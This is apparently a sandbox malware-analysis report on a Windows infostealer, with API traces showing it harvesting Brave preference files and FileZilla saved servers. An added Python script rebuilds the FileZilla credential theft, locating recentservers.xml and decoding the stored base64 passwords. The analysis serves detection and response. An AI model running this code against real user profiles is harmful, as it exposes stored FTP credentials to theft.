                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                                • Instruction ID: 43d79c37a9653b4f5796dc08d26186ed0c8f16b9f7dbd8dd2d8260346c405859
                                • Opcode Fuzzy Hash: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                                • Instruction Fuzzy Hash: 47925F7191161AAFCF22EFA4DC8AEAF77B9AF54300F054528F846AB251DB34DC45CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A18D2
                                • lstrlen.KERNEL32(\*.*), ref: 003A18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 003A190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A1947
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A1967
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1981
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19BF
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A4C
                                • lstrlen.KERNEL32(003C1794), ref: 003A1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A80
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AB4
                                • lstrlen.KERNEL32(?), ref: 003A1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 003A1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B19
                                • lstrlen.KERNEL32(00F78AB8), ref: 003A1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B8F
                                • lstrlen.KERNEL32(003C1794), ref: 003A1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BC3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C57
                                • lstrlen.KERNEL32(003C1794), ref: 003A1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C8B
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D21
                                • lstrlen.KERNEL32(003C1794), ref: 003A1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D55
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DED
                                • lstrlen.KERNEL32(003C1794), ref: 003A1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E36
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E68
                                • lstrlen.KERNEL32(00F7DD68), ref: 003A1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EB2
                                • lstrlen.KERNEL32(003C1794), ref: 003A1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EE3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F15
                                • lstrlen.KERNEL32(00F7E6F8), ref: 003A1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F5F
                                • lstrlen.KERNEL32(003C1794), ref: 003A1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F90
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1FC2
                                • lstrlen.KERNEL32(00F6A6F8), ref: 003A1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2036
                                • lstrlen.KERNEL32(003C1794), ref: 003A2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2067
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2098
                                • lstrlen.KERNEL32(?), ref: 003A20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 003A20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2103
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A213F
                                • lstrlen.KERNEL32(00F7DD38), ref: 003A214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A2181
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                                • Instruction ID: afe61adb01873c9f32c7238108e3b51f9d9a09accf43fb207d7be4c6c0ef178a
                                • Opcode Fuzzy Hash: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                                • Instruction Fuzzy Hash: FC623D31912A16AFCB23AB64CC49EBF77B9EF55700F0A0128F805AB251DB34DD15DBA0
                                APIs
                                • wsprintfA.USER32 ref: 003A392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 003A3943
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A396C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A3986
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A39F2
                                • lstrlen.KERNEL32(003C1794), ref: 003A39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A1A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3A26
                                • lstrlen.KERNEL32(?), ref: 003A3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 003A3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A8A
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A3ACE
                                • lstrlen.KERNEL32(?), ref: 003A3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B36
                                • lstrlen.KERNEL32(003C1794), ref: 003A3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B6A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B9E
                                • lstrlen.KERNEL32(?), ref: 003A3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 003A3BE0
                                • lstrlen.KERNEL32(00F78C18), ref: 003A3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C3C
                                • lstrlen.KERNEL32(00F78AB8), ref: 003A3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CB7
                                • lstrlen.KERNEL32(003C1794), ref: 003A3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CE8
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D79
                                • lstrlen.KERNEL32(003C1794), ref: 003A3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DAD
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E43
                                • lstrlen.KERNEL32(003C1794), ref: 003A3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E77
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F0D
                                • lstrlen.KERNEL32(003C1794), ref: 003A3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F41
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F75
                                • lstrlen.KERNEL32(?), ref: 003A3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 003A3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FE0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A401F
                                • lstrlen.KERNEL32(00F7DD38), ref: 003A402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A40CE
                                • lstrcat.KERNEL32(00000000), ref: 003A40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003A42D9
                                • FindClose.KERNEL32(00000000), ref: 003A42E8
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                                • Instruction ID: d9c048a3457816e496ec8600b8cedb29f66afea4af54fc1e705f5cf9013e0a08
                                • Opcode Fuzzy Hash: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                                • Instruction Fuzzy Hash: 8E625C31912A16AFCB23AF64DC49EAFB7B9EF55700F054128F806A7251DB74EE05CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003A69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 003A6B35
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 83495e13136c17ca0c848ba425e4a56fae5c458a021ed8b0cfd27cb698519b07
                                • Instruction ID: d44d63838f5d60011f12607949fd52f64b748d10e8f005d232a456a9bf8c80d9
                                • Opcode Fuzzy Hash: 83495e13136c17ca0c848ba425e4a56fae5c458a021ed8b0cfd27cb698519b07
                                • Instruction Fuzzy Hash: C0427F71A11A06AFCB22ABB4DC8EEAF77B9EF15700F095458F901EB251DB34D905CB60
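The function above is the sample's FileZilla harvester: SHGetFolderPathA with CSIDL 0x28 (CSIDL_PROFILE, the user's profile folder), lstrcat of `\AppData\Roaming\FileZilla\recentservers.xml`, a LocalAlloc(0x40 = LPTR) read buffer, and string searches for the `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` tags, with result lines labelled `browser: FileZilla`, `profile: null`, `url:`, `login:` and `password:`. FileZilla's default on-disk encoding for saved passwords is base64, which any code running as the user can reverse, and that is all the stealer needs. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox: it rebuilds the same path, parses a constructed recentservers.xml embedded inline, decodes base64 passwords and renders the records in the same labelled layout (the field order is assumed). Entries without a `<Pass>` element, or whose `<Pass>` carries the `crypt` encoding FileZilla uses when a master password is set (assumed format; the example does not try to decrypt it), are reported as not recoverable.

```python
import base64
import binascii
import os
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Relative path the sample appends to the folder returned by
# SHGetFolderPathA(CSIDL 0x28 = CSIDL_PROFILE), per the API trace.
RECENTSERVERS_RELATIVE = os.path.join("AppData", "Roaming", "FileZilla", "recentservers.xml")

# Constructed sample file for offline use; it is not data from the sandbox run.
# Entry 1: saved credentials, password base64-encoded as FileZilla does by default.
# Entry 2: anonymous login (Logontype 0), no <Pass> element.
# Entry 3: entry protected by a master password (encoding="crypt", assumed format).
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>anonymous</User>
      <Logontype>0</Logontype>
    </Server>
    <Server>
      <Host>ftp.internal.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>carol</User>
      <Pass encoding="crypt" pubkey="AAAA">ZmFrZQ==</Pass>
      <Logontype>1</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def recentservers_path(profile_root: Optional[str] = None) -> str:
    """Same absolute path the sample assembles with lstrcpy/lstrcat.
    profile_root stands in for the CSIDL_PROFILE folder (default: current user's home)."""
    if profile_root is None:
        profile_root = os.path.expanduser("~")
    return os.path.join(profile_root, RECENTSERVERS_RELATIVE)


def decode_pass(pass_elem: Optional[ET.Element]) -> Optional[str]:
    """Recover the password from a <Pass> element, or None when there is none
    or when it is master-password protected (base64 alone cannot undo "crypt")."""
    if pass_elem is None or pass_elem.text is None:
        return None
    encoding = pass_elem.get("encoding", "")
    if encoding == "base64":
        try:
            return base64.b64decode(pass_elem.text.strip(), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return None  # malformed base64: treat as not recoverable
    if encoding == "crypt":
        return None
    return pass_elem.text  # very old FileZilla versions stored clear text


def parse_recentservers(xml_text: str) -> List[Dict[str, Optional[str]]]:
    """Extract the fields the sample searches for: <Host>, <Port>, <User>, <Pass>."""
    root = ET.fromstring(xml_text)  # local config file, not attacker-controlled input
    return [{
        "host": server.findtext("Host"),
        "port": server.findtext("Port"),
        "user": server.findtext("User"),
        "password": decode_pass(server.find("Pass")),
    } for server in root.iter("Server")]


def format_record(rec: Dict[str, Optional[str]]) -> str:
    """Render one record with the labels from the sample's string table.
    The field order is an assumption of this example."""
    url = f"{rec['host']}:{rec['port']}" if rec["port"] else (rec["host"] or "")
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {url}",
        f"login: {rec['user'] or ''}",
        f"password: {rec['password'] or ''}",
    ])


def exposed_credentials(xml_text: str) -> List[str]:
    """Only the records that hand an attacker a usable password, i.e. what the
    stealer actually gains from this file."""
    return [format_record(r) for r in parse_recentservers(xml_text) if r["password"]]


if __name__ == "__main__":
    print("would read:", recentservers_path())
    for block in exposed_credentials(SAMPLE_RECENTSERVERS):
        print(block, end="\n\n")
```

Run against a real `recentservers.xml` (and FileZilla's `sitemanager.xml`, which uses the same `<Server>` layout) from a host where this sample executed, `exposed_credentials` lists exactly the FTP/SFTP accounts that must be rotated. Only the `crypt`-encoded entries survive the theft, so enabling FileZilla's master password, or not saving passwords at all, is the configuration change that removes this function's payoff.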
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                                • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                                • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                                • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                                • lstrlen.KERNEL32(?), ref: 0039DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                                • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                                • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                                • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                                • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                                • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                                • lstrlen.KERNEL32(00F78C18), ref: 0039E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                                • lstrcat.KERNEL32(00000000,00F78C18), ref: 0039E269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0039E988
                                • FindClose.KERNEL32(00000000), ref: 0039E997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                                • Instruction ID: d36998c00765df16d6eafdc9ee79acef25e248dccc36731a99e15ca7831f53af
                                • Opcode Fuzzy Hash: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                                • Instruction Fuzzy Hash: 2F526D71911A06AFCF22EF65DC8AEAF77B9AF54700F054528F846AB251DB34DC05CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003960FF
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396152
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396185
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961B5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961F0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00396233
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                                • Instruction ID: acc55249727f5cffb1a2734c0fa7bda0b86c260b6546eb7ca9141bb6e19d1b68
                                • Opcode Fuzzy Hash: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                                • Instruction Fuzzy Hash: A6522B72912A16AFDF22EBA4DC4AEAF77B9AF54300F154424F905EB251DB34EC05CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BFD
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003A6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003A6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 003A6C5A
                                • lstrlen.KERNEL32(00000000), ref: 003A6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 003A6CE2
                                • lstrlen.KERNEL32(00000000), ref: 003A6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 003A6D6A
                                • lstrlen.KERNEL32(00000000), ref: 003A6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003A6DF2
                                • lstrlen.KERNEL32(00000000), ref: 003A6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 003A6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003A6EC9
                                • LocalFree.KERNEL32(00000000), ref: 003A6ED4
                                • lstrlen.KERNEL32(?), ref: 003A6F6E
                                • lstrlen.KERNEL32(?), ref: 003A6F81
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: f324828c6a6c15032024ab924c5d2e04ab98df51686d3ab7827a87e3e2e5d2fd
                                • Instruction ID: de0f0637aa832cc1a2b7f3d3d6f7146ab453d89794935cebb0a195c8945a9d6f
                                • Opcode Fuzzy Hash: f324828c6a6c15032024ab924c5d2e04ab98df51686d3ab7827a87e3e2e5d2fd
                                • Instruction Fuzzy Hash: 66028071A11A16AFCB22ABB4DC4EEAF7BB9EF15704F095454F802EB241DB34D90587A0
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                                Strings
